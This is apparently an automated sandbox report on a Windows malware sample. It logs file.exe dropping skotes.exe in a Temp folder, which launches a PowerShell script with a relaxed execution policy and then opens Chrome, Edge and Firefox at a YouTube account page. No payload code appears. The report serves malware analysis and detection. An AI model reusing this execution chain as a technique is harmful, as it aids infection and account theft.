Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B740D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2096,i,9265304522972539897,9185506368956134932,262144 /prefetch:3
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2228 -parentBuildID 20230927232528 -prefsHandle 2152 -prefMapHandle 2132 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c6f543-2f64-46ba-bc00-280bf6150280} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8a5f6cf10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6864 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6896 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1136 -parentBuildID 20230927232528 -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e04a16-f2f3-4c95-9817-ee287afde24a} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b8c3fb10 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7660 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7708 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3164 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5300 -prefMapHandle 3188 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f24f9574-f2ff-4886-877e-c3019b1407de} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b74c0910 utility
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4112 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4112 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2096,i,9265304522972539897,9185506368956134932,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2228 -parentBuildID 20230927232528 -prefsHandle 2152 -prefMapHandle 2132 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c6f543-2f64-46ba-bc00-280bf6150280} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8a5f6cf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1136 -parentBuildID 20230927232528 -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e04a16-f2f3-4c95-9817-ee287afde24a} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b8c3fb10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3164 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5300 -prefMapHandle 3188 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f24f9574-f2ff-4886-877e-c3019b1407de} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b74c0910 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6864 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6896 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7660 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7708 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
